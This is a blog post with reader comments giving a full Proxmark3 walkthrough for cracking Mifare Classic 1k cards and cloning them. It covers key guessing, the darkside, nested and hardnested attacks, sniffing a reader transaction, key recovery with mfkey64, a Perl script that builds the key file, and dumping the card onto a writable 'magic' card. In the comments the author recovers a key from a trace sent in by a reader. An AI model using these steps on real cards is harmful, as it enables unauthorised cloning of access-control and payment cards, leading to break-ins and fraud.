proxmark3 mifare classic 1k weak / hard

Quick summary of operations to crack/dump/duplicate a Mifare classic 1k with the proxmark3.

The darkside attack (for weak mifare) can be processed with a low cost hardware like the ARC122U, with mfcuk/mfoc over the libnfc.

Nowadays, this attack is not covering a lot of Mifare classic card anymore. The Proxmark3, with a price under $100, is the best choice.
For the Proxmark3, the weak PRNG method is easy to find but the sniff/hardnested method for hard PRNG is more tricky.

You have the whole process here.

Proxmark3 original or clone.
Chinese/Magic cards with block 0 / uid writeable.
… search on well-known China e-commerce/marketplace websites.


./proxmark3 /dev/ttyACM[01]

pm3> hf 14a reader

1) First of all – try generic keys…

like this somekeys.txt, took from Mifare Classic Tool (android)

pm3> hf mf chk *1 A 1234567890ab somekeys.txt

If you are lucky, you have a key… need to check now against B.

pm3> hf mf chk *1 ? KEY_FOUND

If you don’t have B, jump to the “Crack others keys” of each section 2.
If you have B, you have all the keys A/B and you can jump to section 3.

2*) Method for weak

pm3> hf mf mifare

pm3> hf mf chk 0 A KEY_FOUND    (Check Found Key On Block 0 A)

Crack others keys

pm3> hf mf nested 1 0 A KEY_FOUND d   (Crack others keys)

2*) Method for hard

The fun part… you have to fix the card to the proxmark3 (duct tape) connected to a laptop and set the proxmark3 in sniff mode.
If you have a y-usb cable, you can also power the proxmark3 with an usb power pack and connect it back to your desktop to get the traces.
The best way to sniff all the transaction is to put the proxmark3 between the card and the reader.
Push it against the reader, well aligned… and repeat it 3-4 times to get at least one good sniffed transaction.

pm3> hf 14a sniff

 --- trigger the reader with the card (proxmark in between)
 --- remove and repeat to get many traces...

 --- push the proxmark button to stop

 --- read the traces
pm3> hf 14a list

Mifare Classic protocol

Trace example

561882:  1 :     26
    64:  2 : TAG 04  00
 10217:  2 :     93  20
    64:  5 : TAG [[ 9c  59  9b  32 ]]  6c                       UID
 12313:  9 :     93  70  9c  59  9b  32  6c  6b  30
    64:  3 : TAG 08  b6  dd
923318:  4 :     60  ((3C))  f5  7b                             AUTH Block 60
   112:  4 : TAG [[ 82  a4  16  6c ]]                           Nonce Tag (NT)
  6985:  8 :     [[ a1  e4! 58  ce! ]] [[ 6e  ea! 41  e0! ]]    NR , AR
    64:  4 : TAG [[ 5c! ad  f4  39! ]]                          AT
811513:  4 :     8e  0e! 5d! b9                                 AUTH Block 0 N
   112:  4 : TAG 5a! 92  0d! 85!                                Nonce Tag (NT)
  6946:  8 :     98! d7  6b! 77  d6  c6  e8  70                 NR , AR
    64:  4 : TAG ca  7e! 0b! 63!                                AT
670868:  4 :     [[ 3e! 70  9c! 8a ]]
   112:  4 : TAG 36! 41  24! 79
  9505:  8 :     1b! 8c  3a! 48! 83  5a  4a! 27
    64:  4 : TAG 40! 6a! 99! 4b
905612:  4 :     c9  7c  64! 13!       !crc
   112:  4 : TAG b5! ab! 1d! 2b
  6936:  8 :     7e! d2  5c! ca! 4b! 50! 88! c4        !crc
    64:  4 : TAG bf  dd  01  be!
987853:  4 :     56  98  49  d6!       !crc

 ### last block e709c8a is not mandatory
./tools/mfkey/mfkey64 9c599b32 82a4166c a1e458ce 6eea41e0 5cadf439 e709c8a

Check key against A/B

pm3> hf mf chk *1 ? KEY_FOUND

You can possibly bypass next step if the key is the same on A/B.

Crack others keys
replace 60 with the numeric value of the Hexadecimal between double parenthesis in the example – ours is ‘3C’.

pm3> hf mf hardnested 0 A KEY_FOUND 60 B s w

pm3> sc r hard_autopwn -k KEY_FOUND -a

Keys to dumpkeys.bin (perl):

my $v = <<EOF;
  |000|  a0a0a0a0a0a0  | 1 |  b0b0b0b0b0b0  | 1 |          
  |001|  a0a0a0a0a0a0  | 1 |  b0b0b0b0b0b0  | 1 |
  |015|  a0a0a0a0a0a0  | 1 |  b0b0b0b0b0b0  | 1 |    
my @a;
while ($v =~ /.*?([0-9a-f]{12})/is) { push @a, $1; $v = $'; }
open FH, ">dumpkeys.bin";
binmode FH;
foreach my $odd (0,1) {
  for (my $i=$odd;$i<=$#a;$i+=2) {
    my $s = $a[$i];
    while (length($s)) {
      print FH pack('C', oct('0x'.substr($s,0,2)));
      $s = substr($s, 2);
close FH;

Run it and you get a proper dumpkeys.bin to run 'hf mf dump' which relies on it.

 --- put the full keys table in it.

3) From keys to write


xxd dumpkeys.bin

Dump the card to dumpdata.bin

pm3> hf mf dump 1

Prepare .eml

python dumpdata.bin dumpdata.eml

Load in blank Magic/Chinese card

pm3> hf mf cload dumpdata

16 thoughts on “proxmark3 mifare classic 1k weak / hard

  • hi i have been trying to copy hardnested mifare card for long. Can u please help me to send me video instruction below process

  • Please help me i followed every steps. I did sniffing and got some traces. Now how can i run mfkey64 tool? Im using windows 10 with proxmark3 easy clone.

  • i’ve trying to do this for long i will really appreciate for your help. if you don’t mind i can send you teamviewer id pass so can you please show me how to run mfkey tool on my windows.

    • For windows, you should have a mfkey64.exe file and launch it in console mode in the directory where the binary is:

      I tried your parameters but your trace is incomplete I think. You have to snoop more of them.
      A proper ‘AT’ block is missing.

      With a part of your trace:
      mfkey64 933e70b0 db55fe5c a2a7fbde f6e1dc54 a29fb550 90b1e849
      Recovering key for:
      uid: 933e70b0
      nt: db55fe5c
      {nr}: a2a7fbde
      {ar}: f6e1dc54
      {at}: a29fb550
      {enc0}: 90b1e849

      LFSR succesors of the tag challenge:
      nt’: c2669c10
      nt”: 2cf6d3ea

      Keystream used to generate {ar} and {at}:
      ks2: 34874044
      ks3: 8e6966ba

      Decrypted communication:
      {dec0}: 90b1e849

      Found Key: [cdca79f325b9]
      Try it with:
      > hf mf chk *1 ? cdca79f325b9

      If it works, crack the other keys with this (193 is the decimal representation of the ‘C1’ from your trace):

      > hf mf hardnested 0 A cdca79f325b9 193 B s w

  • I successfully found out the key using mfkey64 tool on kali linux.
    And then i used hardnested command to find out other keys but other found keys are all same one.
    Now Im stuck again on dumping and restoring to blank mifare 1k card.
    Can u please tell me how to do it on kali?
    Please send me exactly what commands do i have to use?

    • – Take the perl script source from this page. “Keys to dumpkeys.bin (perl)” – edit a file named for example and copy/paste the code in it.
      – Replace in this perl code the list of keys you got from the command: “sc r hard_autopwn -k KEY_FOUND -a”
      – Execute the perl script with a perl interpretor to get a dumpkeys.bin file
      – Follow the rest of the instructions … 😉

  • thank you for the helpful blog post Guillaume. wondering if you could help me with the same as I’m stuck on what values to input in mfkey64 after getting the dump from ‘hf list mf’ sniffing in iceman on a pm3 easy.
    Could you help with the mfkey64 values like you did the above poster? I’m just a bit confused when to omit certain parts of the strings like in your examples:

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